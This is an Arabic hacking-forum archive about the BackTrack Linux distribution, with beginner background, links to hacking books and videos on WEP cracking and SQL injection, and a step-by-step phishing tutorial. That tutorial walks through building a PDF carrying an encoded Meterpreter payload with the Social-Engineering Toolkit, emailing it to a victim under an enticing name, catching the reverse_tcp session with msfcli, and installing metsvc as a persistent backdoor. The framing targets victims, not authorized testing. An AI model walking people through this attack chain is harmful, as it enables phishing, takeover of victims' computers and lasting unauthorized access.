ارشيف مواضيع مهمة للاختراق المتقدم #احتبار_اختراق #ميتاسبلويت #اختراق

بدايتك مع الباك تراك

سم الله الرحمن الرحيم
كل شخص يدخل العالم الختراق من المستحيل الا يسمع بالباك تراك و البعض يظنه اداة و البعض يضنه برنامج و انتشرة كلمة اختراق بالباك تراك و هذه في اصل كلمة خاطئة لهذا اريد تشارك بعض المعلومات عنه للافادة
في الاول نشرح الليونيكس ستقول لي ما دخل الليونيكس اكمل الموضوع و ستفهم الليونيكس هو نظام التشغيل (بالإنجليزية: Operating System وتختصر إلى OS) يعني هو نظام كامل لتشغيل الكمبيوتر كالويندوز مثلا لكنه مختلف عنه لأنه مفتوح المصدر و كلمة مفتوح المصدر هي تعني انه مجاني او يكون بأفل التكاليف و يمكنك التعديل عليه او اعادة برمجة جزء منه و لا يعتبر هذا اختراق للقانون و لهذا توصف بالبرمجيات الحرة و هذا لان برامج مفنوحة المصدر يأتي معها ملف المصدر و ملف المصدر هو انه عندما تكتب برنامجا يكون لديك ملفين ملف المصدر و ملف التنفيذ ملف المصدر هو الجزء اللذي يكون يحتوي على اكواد البرنامج و ملف التنفيذ هو الجزء القابل للتنفيذ من البرنامج و عند قيام بتغيير اي شيء في ملف المصدر يتغير جزء تنفيذ البرنامج اي بلغة اخرى قد عدلته عليه و هذا ما يعتبر خرقا للقانون في البرامج مغلقة المصدر .
و لهذا نجد عدة توزيعات لليونيكس (توزيعات تعني نسخ في الوينداوز نقول نسخة xp او نسخة 7 و في الليونيكس نقول توزيعات) و منها التوزيعات الامنية اللتي هي في الاصل للحماية لكن في يد القراصنة هي انظمة للقرصنة
و من بين هذه التوزيعات توزيعة الاوبنتو و يطلق عليها اسم التوزيعة الانسانية لانها عكس التوزيعات الاخرى تستهدف كل شرائح المجتمع عكس التوزيعات الاخرى اللتي تستهدف المبرمجين او المحترفين و توزيعة الباك تراك مبنية على الابونتو اي انها هي في الاصل ابونتو لكن تم اضافة لها ادوات(برامج) فحص الاختراق و ليس بالضرورة ان تكون هذه الادوات في الباك تراك بل يمكنك تحميلها على نظام الابونتو و العمل بها لانها ادوات لشركات مستقلة عن شركة الباك تراك و هي برامج مفتوحة المصدر
و لهذا لكي تتعلم الباك تراك يلزمك ان تتعلم في الاول نظام الابونتو من ثم تتعلم ادوات فحص الحماية لانها بحر بحد ذاتها و البرامج مفتوحة المصدر بالطبع مع تعلم لغات البرمجة كال php ; html و الدلفي و c++ و الفيجول بيسك لكي تصبح محترف اختراق و في الاخير اترركم مع هذه الكتب و المواقع الفيدة
كتاب عربي لتعليم توزيعة الابونتو
http://www.simplyubuntu.com/

و هذا الكتاب هو افضل دليل للبرامج مفنوحة المصدر

http://skeleton-eel.blogspot.com/200...post_8602.html

و هذا موقع ابونتو العرب للبرامج مفتوحة المصدر

http://www.ubuntuac.com/
و في الاخير هذان كتابين لتعليم الاختراق
كتاب تعليم اختراق المواقع و المنتديات
http://v1.arabsh.com/o0warngayw0d.html
كتاب احترافي لتعليم الاخراق المواقع و الاجهزة و كل شيء من 400 صفحة
http://www.4shared.com/office/XEKupyUv/____400__.html

رجاءا لا تقومو باستغلال هذه المعلومات في استهداف اخوانكم الشيعه و انا بريء امام الله بكل من يقوم بهذا
هذه المعلومات تبدوا تافهة لكنها ثمينة لكل مبتدأ
و عذرا ان كان تقصير في هذا الموضوع و السلام عليكم

Crack wep with backtrack 3

Crack wep with backtrack 3 http://www.youtube.com/watch?v=oHq-cKoYcr8

باك تراك backtrack r00ts3curity team

باك تراك (بالإنجليزية: Back Track) هي توزيعة لينكس مبنية على سلاكس والتي بدورها مبنية على توزيعة سلاكوير, منذ الاصدار الرابع تم بناء التوزيعة على توزيعة اوبنتو وكان الاصدار الثالث اخر اصدار مبني على سلاكوير.والاصدار الخامس الأخير بني على أبونتو الاصدار العاشر

وهي التوزيعة الخاصة بالأمن والحماية وتحتوي التوزيعة على أدوات مساعدة في مجال الامن والحماية, وتستخدم في اختبار الاختراق (بالانجليزية: penetration testing) وهم الذين يقومون بفحص الشبكات وتستعمل أيضا عند اسأءة استخدامها كأداة قوية لخدمة المخترقين واختراق المواقع والسيرفرات وأكثر عملها بالأوامر، ومن أبرز استخداماتها تفحص الأمن في شبكات اللاسلكي والسلكي إذ أن أكثر أدوات باك تراك تختص بفحص الشبكات وخصوصاً اللاسلكية منها، وكذلك اختراقها في أقصر الأوقات، كما أنها متخصصة أيضا في اختراق الأجهزة على الشبكة.

كما تضم باك تراك العديد من البرامج الأساسية والبسيطة الموجودة عادة في التوزيعات الأخرى.

Hacking XXXsite DataXXXX with SQLmap in Backtrack 5

Hacking XXXsite DataXXXX with SQLmap in Backtrack5

شرح اداة sqlmap لاحتراف الحقن

في توزيعة baktrack

شرح فيديو

http://www.youtube.com/watch?v=hANMjTqFLD8

فحص المواقع وإستخراج ثغراتها Vega Back Track 5 r2

شرح
فحص المواقع وإستخراج ثغراتها Vega Back Track 5 r2

كود:

http://www.youtube.com/watch?v=4HhM6-sC000

الهندسة الاجتماعية على الباك تراك بواسطة الميتاسبلويت

اليوم بنتكلم عن الاختراق بالهندسة الاجتماعية ( Social Engineering ) و هي ما يعرف باقناع الضحية بما حوله من البيئة المحيطة به على الانترنت او ايا كان .. و لا يخفى على الجميع ان اشهر مهندس اجتماعي هو كيفين ميتنيك

بحاول اني ما اخرج عن الموضوع .. ( باختصار هي التلاعب بالناس لفعل ما تريد لكي تحصل على ما تريد )

بصراحة و بالنسبة لي .. تعتبر الهندسة الاجتماعية سلآح فتاك و خطير لانها لا تتوقف على اقفال ثغرة معينة او حماية للنظام و ما الى ذلك .. لانه بعد اقناع الضحية لا شيء يقف امام الوصول لما تريد .

================================================== ========

نرجع لموضوعنا ..

كيف تتم العملية ؟

1-عن طريق اداة من صناعة المبرمج ديفيد كنيدي ( مبرمج الفاست تراك )
2-حقن بايلود مشفر من جميع الحمايات بكتاب الكتروني بصيغة pdf
3-ارسال الملف لبريد الضحية على الانبوكس
4-التنصت و الانتظار حتى يتم الاتصال بالضحية

ماهي الادوات اللازمة للقيام بالعملية ؟

1-Social-Engineering Toolkit
2-Gmail account
3-M3tasploit

طبعا كل الادوات متوفرة على الباك تراك الا Social-Engineering Toolkit سوف نقوم بتحميلها و صنع مجلد لها

نبدا مع اول امر وهو لتحميل الاداة و صنع مجلد لها

كود:
svn co http://svn.thepentest.com/social_engineering_toolkit/ SET/
ملاحظة : يجب ان تكون root ..

الان ندخل على مجلد الاداة بالامر :

كود:
cd SET
من ثم نشغل الادة عن طريق الامر :

كود:
./set
و هذي صورة توضيحية للامرين ..

تم تصغير حجم الصورة تلقائياً لسهولة التصفّح , اضغط هنا لمشاهدتها بالحجم الطبيعي 662x439.

اشرح لكم الخيارات ..

الخيار رقم 1 لعمل هندسة اجتماعية عبر الايميل ..

الخيار رقم 2 لعمل هندسة اجتماعية عبر صفحات الويب

و الخيارات الباقية للتحديث و صنع بايلودات ..

عموما هجومنا هو رقم 1 اللي يتم عن طريق الايميل ..

نختار الخيار الاول بالرقم 1 و نشوف :

مثل ماهو واضح بالصورة .. طلع لنا خيارين ثانية نختار الخيار الاول بالرقم 1 ثم راح يسالك اذا تبي تكون بايلود او لا نختار نعم

الان ظهر لنا عدة خيارات لطريقة زرع البايلود اللي تبي تكونه داخل الكتاب الالتروني ..

نختار رقم 4 لانه هو الفعال دائما .. اما الباقي فهو عن طريق ثغرات اي ان هناك احتمال بعدم نجاح العملية ..

و بعد ما اخترنا الاستغلال المناسب .. الان نحدد البايلود المناسب و يفضل Meterpreter

تم تصغير حجم الصورة تلقائياً لسهولة التصفّح , اضغط هنا لمشاهدتها بالحجم الطبيعي 740x439.

الان اكتملت الاعدادات و تم صناعة الملف و البايلود بنجاح ..

نضغط انتر لاستكمال العملية و ارسال الملف

بيظهر لك خيارين .. الاول اذا كنت تبي تترك اسم الملف زي ماهو تختاره ..

الثاني يقلك لا .. لازم اظهر بمظهر اكثر جاذبية للضحية

طبعا اكيد نختار الخيار الثاني و نسمي الملف باسم جذاب ..

تم تصغير حجم الصورة تلقائياً لسهولة التصفّح , اضغط هنا لمشاهدتها بالحجم الطبيعي 662x439.

الان ايضا .. ظهر لنا خيارين جديدة الخيار الاول يعني ارسال الملف لايميل واحد فقط
اما الخيار الثاني فهو لارسال الملف لعدة ايميلات !

نختار الخيار الاول .. بالرقم 1 < انت بامكانك تختار الخيار الثاني

بعد ما اخترنا الخيار الاول الان ظهرت لنا خيارات اخرى تفيد عنوان الرسالة و ما بداخلها

طبعا يوجد اكثر من خيار .. بالنسبة لي انا اعجبتني الرسالة رقم 4 و انت اذا ما عجبك شيء بامكانك تكتب رسالة اخرى من تاليفك بالرقم 6

تم تصغير حجم الصورة تلقائياً لسهولة التصفّح , اضغط هنا لمشاهدتها بالحجم الطبيعي 662x439.

بعد ما حددنا الرسالة المطلوبة الان يطلب منا تحديد الايميل المراد استهدافه ..

نحدده و نتبع الخيارات المتبقية ..

تم تصغير حجم الصورة تلقائياً لسهولة التصفّح , اضغط هنا لمشاهدتها بالحجم الطبيعي 662x439.

بعد ما تم تحديد ايميل الضحية .. طلب منا عنوان المرسل فاخترت عن طريق حساب gmail و ادخلت الحساب و الباسورد .. و من ثم طلب مني اذا كنت ابي اتنصت و لا لا و اخترت لا لاني بعد شوي راح اتنصت يدويا افضل ..

الان تم ارسال الرسالة وش رايكم نشوف كيف شكلها ؟

تم تصغير حجم الصورة تلقائياً لسهولة التصفّح , اضغط هنا لمشاهدتها بالحجم الطبيعي 668x276.

.. واضحة الرسالة و الملف مرفق معها .. و بنفس عنوان الرسالة اللي اخترناه قبل شوي !

طيب الان نتنصت لانتظار الضحية بالامر :

كود:
./msfcli exploit/multi/handler PAYLOAD=XXXXXXs/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=5555 E

الان نلاحظ الصورة بعد ما تنصتنا و بعد ما فتح الضحية الملف ظهور جلسة جديدة !

تم تصغير حجم الصورة تلقائياً لسهولة التصفّح , اضغط هنا لمشاهدتها بالحجم الطبيعي 696x439.

================================================== ========

اضافة بسيطة و مفيدة جدا

و هي ثبات الضحية و المقدرة للرجوع اليه في اي وقت تحبه .. وهو ما يعرف بالـ metsvc

حلوو ..

بعد ما وصلنا لجهاز الضحية مثل ماهو وآضح فوق راح ننفذ امر بسيط جدا لتثبيت خدمة الـ metsvc

كود:
run metsvc
تم تصغير حجم الصورة تلقائياً لسهولة التصفّح , اضغط هنا لمشاهدتها بالحجم الطبيعي 696x439.

لان بعد تنصيب الخدمة و في حال خروج الضحية ..

تقدر ترجع للضحية بالامر التالي :

كود:
./msfcli exploit/multi/handler PAYLOAD=XXXXXXs/metsvc_bind_tcp LPORT=31337 RHOST=192.168.1.3 E
بحيث RHOST= اي بي الضحية و LPORT= البورت تبع الخدمة وهو ثابت

نلاحظ الصورة

تم تصغير حجم الصورة تلقائياً لسهولة التصفّح , اضغط هنا لمشاهدتها بالحجم الطبيعي 662x439.

تصوير الشاشة لعمل الشروحات لنضام (الباك تراك

مرحبأ أحبائ اليوم جايب لكم برنامج تصوير صطع المكتب وعمل شروحات على نضام الباك تراك 5[ افتح Terminal ونفذ الامر sudo apt-get install recordmydesktop gtk-recordmydesktop

كتاب ابونتو ببساطة|كتاب عن توزيعه ابونتو |شرح تنصيب ابونتو

السلام عليكم ورحمة الله وبركاته

هذا كتاب بلغة العربية يتحدث عن توزيعة ابوتنو التوزيعه الانسب للمنتقلين حديثا الى لينيكس

كتاب رائع يتحدث بشكل مبسط عن ابونتو وكيفية تنصيب ابونتو ويتحدث ايضا عن التخصيص في ابونتو واشياء اخرى في التوزيعه

الجميل في الكتاب انه مبسط وبعيد كل البعد عن التعقيد لذلك تبرز فائدته للمبتدئين في انظمة لينيكس

هنا الموقع الرسمي للكتاب